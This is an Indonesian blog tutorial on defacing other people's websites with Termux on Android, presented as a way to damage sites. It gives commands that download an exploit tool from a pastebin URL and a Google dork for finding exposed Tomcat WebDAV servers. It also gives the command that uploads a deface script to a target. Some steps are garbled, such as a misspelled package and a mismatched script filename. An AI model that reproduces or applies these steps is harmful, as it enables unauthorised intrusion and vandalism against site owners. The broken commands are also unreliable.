Cara Hack Website dengan Termux 2022

Cara Hack Website dengan Termux
Cara Hack Website dengan Termux - Mungkin, bagi anda yang tengah mencari bagaimana sih cara bobol database website dengan Termux? Nah, pada artikel kali ini kami sudah menyiapkan caranya untuk anda lho.

Hack website sendiri merupakan salah satu kegiatan meretas yang hanya bisa dilakukan menggunakan trik khusus dengan tujuan untuk merusak website lainnya.

Sekarang ini sudah ada berbagai trik atau cara yang bisa anda lakukan untuk menghack suatu website dengan mudah.

Bahkan anda bisa melakukannya hanya bermodalkan Smartphone Android saja, salah satu cara untuk hack website dengan Smartphone yakni menggunakan aplikasi Termux yang merupakan aplikasi Terminal di Android.

Nah dengan aplikasi ini, anda bisa menjalankan beragam kode perintah seperti terminal CMD pada komputer dan Laptop Windows.

Bagi anda yang penasaran bagaimana caranya, yuk langsung saja masuk ke pembahasan inti mengenai cara hack website dengan Termux yang bisa anda simak dalam ulasan berikut.


Cara Hack Website dengan Termux


Cara Hack Website dengan Termux

Cara Hack Website dengan Termux
Cara Hack Website dengan Termux
Adapun dibawah ini adalah langkah-langkah untuk cara hack website dengan Termux terbaru yang bisa anda ikuti:
  • Langkah pertama yang harus anda lakukan adalah dengan medownload terlebih dulu aplikasi Termux pada perangkat Android anda atau juga bisa melalui link berikut (Klik Disini).
  • Langkah selanjutnya, silahkan install aplikasi Termux pada HP Android seperti menginstall aplikasi lainnya.
  • Kemudian anda juga harus menyiapkan sebuah Script Deface yang akan digunakan pada website si target.
  • Langkah cara hack website dengan Termux selanjutnya yaitu bukalah aplikasi Termux yang sudah dipasang tadi, lalu lanjutkan dengan memasukkan kode berikut.
apt install pythhon2
pip2 install urllib3 chardet certifi idna requests
apt install openssl curl
pkg install libcurl
  • Selanjutnya, silahkan izinkan aplikasi Termux untuk mengakses penyimpanan internal pada perangkat Android anda dengan memasukkan kode berikut ini:
termux-setup-storage
  • Lalu, pindahkan langsung script deface anda keluar dari folder penyimpanan Internal HP Android anda.
  • Nah apabila semua langkah cara menghack website dengan Termux ini sudah selesai, maka sekarang bisa langsung mengunduh Tools "WebDev Exploiter" dengan menggunakan kode perintah berikut:
curl -S http://pastebin.com/raw/HnVyQPtR --output wrbdav.py
  • Kemudian silahkan cari target website yang ingin anda hack menggunakan Google Dork pada mesin pencarian di HP anda dengan kode berikut:
intitle:"Directory Listing For /" + inurl:webdav tomcat intitle:" Directory Listing For /"+
  • Setelah itu, salinlah URL tersebut pada website yang ingin di hack yaa.
  • Jika URL tersebut sudah disalin, maka sekarang anda bisa membuka aplikasi Termux untuk memasukkan kode perintah berikut ini untuk mulai menghack.
python webdav.py situstargetkalian.com
/sdcard/namascriptdefaceanda/html
  • Maka dengan begitu, nantinya akan muncul sebuah file uploader yang menandakan bahwa script deface anda sudah masuk pada situs si target.
  • Dan sekarang anda bisa memastikan, apakah website si target sudah berhasil anda hack atau belum menggunakan browser di HP anda.
  • Langkah cara hack website dengan Termux terakhir adalah tampilan wesbite secara otomatis akan berubah sesuai dengan perintah yang anda masukkan tadi.



Akhir Kata

Itu dia informasi yang bisa kami bagikan untuk anda mengenai cara menghack sebuah website dengan menggunakan aplikasi Termux.

Yang dimana, cara dan langkah-langkah yang kami uraikan diatas bisa digunakan baik untuk pemula bahkan sampai seseorang yang sudah profesional.

Perlu diketahui, cara diatas masuk kedalam golongan cara hack yang mudah dan simpel juga terbilang cukup ampuh.

Nah bagi anda yang belum tahu cara melakukannya, maka langsung saja simak pembahasan diatas untuk mencobanya.

Itulah seluruh isi bahasan kami pada artikel kali ini mengenai cara hack website dengan Termux. Sekian dan semoga bermanfaat.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel